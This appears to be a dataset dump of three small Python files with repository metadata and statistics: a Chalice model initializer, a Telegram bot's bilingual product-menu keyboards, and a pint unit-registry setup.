[ "MIT" ]
null
null
null
employee_det/chalicelib/model/__init__.py
cadenababa/employee-details
f537dd797e20fa8aaf6bfe3bef20106dd8073ad1
[ "MIT" ]
null
null
null
employee_det/chalicelib/model/__init__.py
cadenababa/employee-details
f537dd797e20fa8aaf6bfe3bef20106dd8073ad1
[ "MIT" ]
1
2020-12-13T07:16:28.000Z
2020-12-13T07:16:28.000Z
# Package initializer: re-export the model layer and eagerly build it.
from chalicelib.model.models import *

# NOTE(review): this rebinds the star-imported EmployeeDetails *class* name to
# a singleton *instance*, so importers of this package see the instance, not
# the class. Presumably intentional (module-level singleton), but the star
# import hides where the name comes from -- confirm against callers.
EmployeeDetails = EmployeeDetails()
24.666667
37
0.824324
7
74
8.714286
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.094595
74
3
38
24.666667
0.910448
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
e3931d83e8b52d54c8471cd83a5c8800c1cb4258
430
py
Python
keyboards/default/product_menus.py
Asadbek07/e-commerce-bot
df6c1bb625becf95bf53f4cece12752dca9f7f67
[ "Unlicense", "MIT" ]
null
null
null
keyboards/default/product_menus.py
Asadbek07/e-commerce-bot
df6c1bb625becf95bf53f4cece12752dca9f7f67
[ "Unlicense", "MIT" ]
null
null
null
keyboards/default/product_menus.py
Asadbek07/e-commerce-bot
df6c1bb625becf95bf53f4cece12752dca9f7f67
[ "Unlicense", "MIT" ]
null
null
null
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton

# Uzbek-language product menu: basket and place-order buttons on a single row.
_uz_row = [
    KeyboardButton(text="📥Savat"),
    KeyboardButton(text="🚖Buyrtuma berish"),
]
products_menu_uz = ReplyKeyboardMarkup(
    keyboard=[_uz_row],
    row_width=2,
    resize_keyboard=True,
)

# English-language product menu, mirroring the Uzbek layout above.
_eng_row = [
    KeyboardButton(text="📥Basket"),
    KeyboardButton(text="🚖Place an order"),
]
products_menu_eng = ReplyKeyboardMarkup(
    keyboard=[_eng_row],
    row_width=2,
    resize_keyboard=True,
)
13.870968
61
0.718605
47
430
6.489362
0.553191
0.236066
0.268852
0.295082
0.478689
0.177049
0
0
0
0
0
0.00551
0.155814
430
30
62
14.333333
0.823691
0
0
0.47619
0
0
0.102804
0
0
0
0
0
0
1
0
false
0
0.047619
0
0.047619
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
e3974f70139e1e89415433a3216c1d8c9eb5ca2b
52
py
Python
src/openrxn/__init__.py
alexrd/OpenRXN
f61817b2e9a7f83451817c4350e88faaa1de2914
[ "MIT" ]
5
2020-01-29T19:04:44.000Z
2021-01-22T15:55:27.000Z
src/openrxn/__init__.py
ADicksonLab/OpenRXN
f61817b2e9a7f83451817c4350e88faaa1de2914
[ "MIT" ]
null
null
null
src/openrxn/__init__.py
ADicksonLab/OpenRXN
f61817b2e9a7f83451817c4350e88faaa1de2914
[ "MIT" ]
null
null
null
# Package-level pint unit registry, created once at import time.
from pint import UnitRegistry

# NOTE(review): assumes one process-wide registry is desired; pint quantities
# built from different registries do not interoperate -- confirm all modules
# import `unit` from here rather than creating their own.
unit = UnitRegistry()
17.333333
29
0.807692
6
52
7
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.134615
52
2
30
26
0.933333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3